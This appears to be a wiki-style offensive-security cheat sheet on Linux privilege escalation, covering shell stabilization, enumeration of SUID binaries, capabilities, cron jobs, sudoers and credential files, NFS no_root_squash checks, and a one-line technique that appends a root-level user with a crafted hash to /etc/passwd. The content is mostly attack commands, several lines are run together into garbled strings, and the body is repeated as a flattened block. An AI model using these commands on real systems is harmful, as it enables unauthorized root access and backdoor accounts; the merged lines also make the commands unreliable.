Path to Root

Shell Stabilization

python -c 'import pty;pty.spawn("/bin/bash")' #OR
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z #Background Process
stty raw -echo ; fg ; 
reset
stty columns 200 rows 200

Manual Enumeration

#check basic info on the system
which 
    gcc
    cc
    python
    perl
    wget
    curl
    fetch
    nc
    ncat
    nc.traditional
    socatCompilation

uname -a
cat /etc/issue 
cat /etc/*-release
sudo -lls -lsaht /etc/sudoers
groups <user>
cd /home/ls -la #find users
find / -perm -u=s -type f 2>/dev/null #Find SUIDS we can use
find / -perm -g=s -type f 2>/dev/null #Find GUIDS we can use
ls -la /var/www/html/ #Check for files containing creds

#what does the network look like?
netstat -antup
netstat -tunlp

#find all files created by our user
find / -user {username} 2>/dev/null

#any capabilites we can exploit?
getcap -r / 2>/dev/null

#any services running as root?
ps aux |grep -i 'root' --color=auto

mysql -uroot -p

#anything in /etc/ at our user level?
ls -la /etc

#any config files left behind?
ls -lsaht |grep -i ‘.conf’ --color=auto

#any secret files?
ls -lsaht |grep -i ‘.secret’ --color=auto

#any SSH files we can mess with?
ls -lsaR /home/

#do we have file transfer capabilities?
ls -lsaht /bin/ |grep -i 'ftp' --color=auto

ls -lsaht #take a look at these folders for weird shit
    /var/lib
    /var/db
    /opt/
    /tmp/
    /var/tmp/
    /dev/shm/

#cronjobs
cat /etc/crontab
ls -la /etc/cron
crontab -u root -l

#can we exploit weak NFS Permissions?
cat /etc/exports #no_root_squash

#can we write to /etc/password?
openssl passwd -1haxor$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.echo 'alien:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:alien:/home/alien:/bin/bash' >> /etc/passwdsu alienid

#need to add port forwarding
#need to add NFS mounting

NFS? Can we exploit weak NFS Permissions?cat /etc/exports no_root_squash?

PreviousGrep Cheat Sheet NextBash Cheat Sheet

Last updated 2 years ago

python -c 'import pty;pty.spawn("/bin/bash")' #OR python3 -c 'import pty;pty.spawn("/bin/bash")' export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp export TERM=xterm-256color alias ll='ls -lsaht --color=auto' Ctrl + Z #Background Process stty raw -echo ; fg ; reset stty columns 200 rows 200

#check basic info on the system which gcc cc python perl wget curl fetch nc ncat nc.traditional socatCompilation uname -a cat /etc/issue cat /etc/*-release sudo -lls -lsaht /etc/sudoers groups <user> cd /home/ls -la #find users find / -perm -u=s -type f 2>/dev/null #Find SUIDS we can use find / -perm -g=s -type f 2>/dev/null #Find GUIDS we can use ls -la /var/www/html/ #Check for files containing creds #what does the network look like? netstat -antup netstat -tunlp #find all files created by our user find / -user {username} 2>/dev/null #any capabilites we can exploit? getcap -r / 2>/dev/null #any services running as root? ps aux |grep -i 'root' --color=auto mysql -uroot -p #anything in /etc/ at our user level? ls -la /etc #any config files left behind? ls -lsaht |grep -i ‘.conf’ --color=auto #any secret files? ls -lsaht |grep -i ‘.secret’ --color=auto #any SSH files we can mess with? ls -lsaR /home/ #do we have file transfer capabilities? ls -lsaht /bin/ |grep -i 'ftp' --color=auto ls -lsaht #take a look at these folders for weird shit /var/lib /var/db /opt/ /tmp/ /var/tmp/ /dev/shm/ #cronjobs cat /etc/crontab ls -la /etc/cron crontab -u root -l #can we exploit weak NFS Permissions? cat /etc/exports #no_root_squash #can we write to /etc/password? openssl passwd -1haxor$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.echo 'alien:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:alien:/home/alien:/bin/bash' >> /etc/passwdsu alienid #need to add port forwarding #need to add NFS mounting